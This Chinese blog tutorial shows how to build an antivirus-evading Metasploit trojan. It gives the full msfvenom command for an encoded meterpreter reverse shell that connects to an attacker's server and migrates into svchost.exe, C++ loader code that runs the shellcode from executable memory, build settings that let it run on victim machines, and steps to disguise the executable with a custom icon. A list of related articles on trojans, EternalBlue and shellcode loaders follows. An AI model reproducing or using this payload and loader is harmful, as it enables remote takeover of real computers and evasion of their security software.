MSF木马的免杀(三)

2024-03-12 10:30
文章标签 免杀 木马 msf

本文主要是介绍MSF木马的免杀(三),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

目录

MSF木马的免杀

C/C++加载免杀

加图标


MSF木马的免杀

MSF下输入下列命令,生成免杀shellcode

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > shellcode.c

这里的 payload 选择 windows/meterpreter/reverse_tcp,LHOST和LPORT分别填VPS的地址和MSF监听的端口,-e x86/shikata_ga_nai -i 15 是用 x86/shikata_ga_nai 编码 15 次(建议编码12次以上),而 PrependMigrate=true  PrependMigrateProc=svchost.exe 使这个程序默认会迁移到 svchost.exe 进程。

会生成 shellcode.c 文件,打开该文件如图所示:

C/C++加载免杀

然后在VS中新建一个C++项目,我这里在VS2012中新建一个c++的win32项目,然后将下面的代码复制进去,再将shellcode.c里面的那些复制到shellcode的位置。

#include<stdio.h>
#include<windows.h>#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[]= 这里填shellcode;
void main(){LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);memcpy(Memory, shellcode, sizeof(shellcode));((void(*)())Memory)();
}

如下,点击生成解决方案,之后会生成一个exe程序

生成的exe程序即是免杀之后的木马程序。还可以进行其他伪装,比如修改图标,修改程序名等。

如果直接把该程序拿到win7或server2008之类的虚拟机去执行,可能会提示缺少dll文件。这是因为我们在编译程序的过程中是使用的动态编译,如果目标机器不存在相关的dll文件就会报此错误。

解决办法就是我们在编译程序的时候,选择静态编译的方法。静态编译就是在编译可执行文件的时候,将可执行文件需要调用的对应动态链接库(.dll)中的部分提取出来,链接到可执行文件中去,使可执行文件在运行的时候不依赖动态链接库。但是这样使用静态编译的方法可能会导致编译出来的程序会偏大。

静态编译,需要如下配置:

  • 右键项目 -> 属性 -> 配置属性 -> 高级 -> MFC的使用:在静态库中使用MFC
  • 右键项目 -> 属性 -> C/C++ -> 代码生成 -> 运行库:选择 多线程(/MT)
  • 编译时选择Debug  x86

然后重新 生成——>重新生成解决方案 进行编译。然后在目标机器运行,我们就可以收到弹回的session了。

加图标

如果想对木马加图标的话,右键项目——>添加——>资源

然后选择icon

这样就会在程序目录下生成一个icon1.ico文件,我们用自己的ico图标将该文件替换。

重新编译,生成的exe程序就是我们指定的图标了。

 

注:貌似现在这种免杀方法也会被查杀了

这篇关于MSF木马的免杀(三)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/800971

相关文章

BT天堂网站挂马事件后续:“大灰狼”远控木马分析及幕后真凶调查

9月初安全团队披露bt天堂网站挂马事件,该网站被利用IE神洞CVE-2014-6332挂马,如果用户没有打补丁或开启安全软件防护,电脑会自动下载执行大灰狼远控木马程序。 鉴于bt天堂电影下载网站访问量巨大,此次挂马事件受害者甚众,安全团队专门针对该木马进行严密监控,并对其幕后真凶进行了深入调查。 一、“大灰狼”的伪装 以下是10月30日一天内大灰狼远控的木马样本截图,可以看到该木马变种数量不

计算机木马详细编写思路

导语: 计算机木马(Computer Trojan)是一种恶意软件,通过欺骗用户从而获取系统控制权限,给黑客打开系统后门的一种手段。虽然木马的存在给用户和系统带来严重的安全风险,但是了解它的工作原理与编写思路,对于我们提高防范意识、构建更健壮的网络安全体系具有重要意义。本篇博客将深入剖析计算机木马的详细编写思路,以及如何复杂化挑战,以期提高读者对计算机木马的认识和对抗能力。 计算机木马的基本原

木马导致inetinfo.exe进程占100% CPU的解决方法

电脑进程inetinfo.exe主要用于支持微软Windows IIS网络服务的除错。正常情况下,inetinfo.exe 是 IIS admin Service 或 world wide web publishing service 。这个程序对你系统的正常运行是非常重要的。inetinfo.exe进程属于系统组件,请不要试图停止和删除!   但是如果inetinfo.exe占用CPU 10

Kali-MSF-永恒之蓝漏洞复现(ms17_010_eternalblue)

目录 一、漏洞利用 1.主机发现 2.msf拿取shell 3.获取屏幕 4.文件上传 5.文件下载 6.远程登录 7.上传后门 nc利用 法一:目标主动(推荐) 法二:目标被动(该方法需要msf协助,有点本末倒置) 8.免杀 9.清除日志 二、预防策略 1.打开防火墙 2.安装杀毒软件 3.禁用445端口 使用防火墙新增规则,禁用端口 关闭server服务

.NET 一款免杀的白名单Shellcode加载器

01阅读须知 此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面 02基本介绍 Sharp4XOMLLoader 是一款执行 XOML(eXtensible Object

python-旋转木马(赛氪OJ)

[题目描述] 我们要做一个旋转木马! 输入一个 n×n 的字符矩阵,将其顺时针旋转 90 度后输出。输入格式: 输入共 n+1 行。 第一行一个整数 n,表示矩阵大小。 接下来 n 行,每行一个长度为 n 的字符串,仅包含小写字母,表示这个矩阵。输出格式: 输出顺时针旋转 90 度后的矩阵,行末不要出现多余空格。样例输入 3 aaa bbb ccc样例输出 cba cba cba数据范围 对于 1

记录一次解决kworkerds挖矿木马之旅

最近服务器上执行命令特别卡,使用top -c命令查看资源使用情况。好家伙,CPU基本占满了。使用kill命令杀掉进程之后,没过多久又重新启动。 网上搜索kworkerds,发现是挖矿木马。翻阅很多博客,按照步骤来。crontab -l查看是否被人恶意添加了定时任务,但是并没有。后来在/var/spool/cron目录下发现了挖矿定时任务。/var/spool/cron/ 这个目录下存放的是每

[-] Auxiliary failed: Msf::OptionValidateError The following options fa

msf > use auxiliary/scanner/smb/smb_version  msf auxiliary(smb_version) > set RHOSTS 192.168.229.133 RHOSTS => 192.168.229.133 msf auxiliary(smb_version) > run [-] Auxiliary failed: Msf::Optio

Tomcat上传jsp木马

一、暴力破解 首先我们访问目标IP和端口 点击server status登录,直接burp进行爆破    我们输入tomcat  123 抓包,发现这个Basic是base64编码后的,解码是 tomcat:123 我们暴破时需要注意这里用的base64构成的,具体操作可以看http://t.csdnimg.cn/yF6xW 解码之后就能进去了。 二、制作JSP木马

【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS

~ 会当凌绝顶,一览众山小 ~ 前言 博客主页:h0ack1r丶羽~ 从0到1~ 渗透测试中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,本文主要讲解了【靶机能上TCP和不能上TCP的区别】【利用pingtunnel